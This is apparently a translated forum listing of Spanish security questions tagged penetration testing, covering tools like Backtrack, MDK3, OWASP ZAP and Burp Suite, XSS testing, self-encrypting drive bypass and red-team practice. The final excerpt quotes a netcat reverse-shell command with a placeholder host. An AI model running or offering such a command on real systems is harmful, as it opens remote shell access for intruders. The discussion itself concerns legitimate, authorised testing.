Preguntas con etiqueta 'penetration-test'

1
respuesta

Pen Testing de la aplicación ASP.NET con Backtrack

Hemos desarrollado una aplicación empresarial basada en ASP.NET que pronto se lanzará. Ahora, estamos preocupados por los aspectos de seguridad de la aplicación. He estado buscando en Backtrack 5 y también visité muchos sitios web sobre pruebas...
hecha 24.05.2013 - 13:08
2
respuestas

¿Pruebas de vulnerabilidad sin el uso de exploits?

Estaba haciendo algunas pruebas en un servidor para ver si era vulnerable a un exploit local de 0 días (el exploit era para obtener privilegios de root usando un error en el kernel de Linux). No había información real todavía sobre cómo saber si...
hecha 16.05.2013 - 18:59
3
respuestas

¿Se pueden considerar las pruebas de penetración como parte de un programa de gestión de vulnerabilidades?

¿Se pueden considerar las Pruebas de Penetración como parte de un programa exhaustivo de Gestión de Vulnerabilidades? P.S: Me doy cuenta de la diferencia entre las pruebas de penetración y la evaluación de vulnerabilidad. ¿Pero quiero saber si a...
hecha 01.05.2013 - 11:50
2
respuestas

¿Qué preocupaciones de seguridad se deben tener en cuenta al piratear sitios web de invitación abierta?

Hay un par de otras preguntas que ya abordan aspectos legales, éticos y de responsabilidad de hackear sitios web con invitaciones abiertas. ¿Cuáles son las preocupaciones legales / éticas a tener en cuenta al hackear sitios web con invitacio...
hecha 02.04.2012 - 20:25
4
respuestas

MDK3 advierte sobre la baja de calificación de WPA2: ¿cómo puedo encontrar la clave en Wireshark?

Mientras realizaba una prueba de estrés en mi enrutador con MDK3, recibí el mensaje "¡¡¡ADVERTENCIA REALMENTE GRANDE !!! Parece que un cliente conectado a su punto de acceso de destino pierde datos de PLAINTEXT mientras se autentica !!" Vi la...
hecha 15.09.2012 - 01:36
2
respuestas

OWASP ZAP FUZZ funcionalidad no resaltada

Soy un principiante con ZAP. Estoy tratando de usar la lógica FUZZ para las contraseñas. Pero puedo ver esa opción cuando hago clic en la contraseña en la tabla de solicitud pero no puedo hacer clic en ella, ya que es débil y no se puede hacer c...
hecha 19.12.2016 - 10:43
1
respuesta

Unidades de autocifrado SSD - Configuración / bypass de arranque en caliente

He visto a gente desplegar el SED en computadoras portátiles recientemente. Descubrí que hay una configuración en la que puede hacer un arranque en caliente y NO requerir que se ingrese nuevamente la contraseña de arranque. Lo que tiene sentido...
hecha 28.10.2014 - 16:43
2
respuestas

¿Cómo administrar los subproductos de prueba de la pluma?

A menudo, al realizar una prueba de lápiz, necesita martillar ciertas partes del sitio que pueden ser visibles para otros usuarios. Si, por ejemplo, sospecha que una sección de comentarios es vulnerable a XSS, puede enviar 20 o más comentarios c...
hecha 30.10.2013 - 18:32
3
respuestas

Importancia de Tool-Stealth para Red Team Internal Audit

Cuando llegue el momento de la fase interna de una caja blanca o una auditoría del equipo rojo, donde se haya encerrado en un fregadero en un edificio de oficinas de una compañía de Fortune 500, creo que lo último No es necesario que Burp Suite...
hecha 01.08.2016 - 08:23
2
respuestas

Pentest: manejo de múltiples shells inversos

Estoy ejecutando un Pentest y estoy esperando shells inversos de múltiples shells que se conectan de nuevo como: - nc <my-ip> <my-port> -e /bin/bash Sin embargo, estoy tratando de descubrir la mejor manera de administrar estas c...
hecha 07.12.2013 - 14:52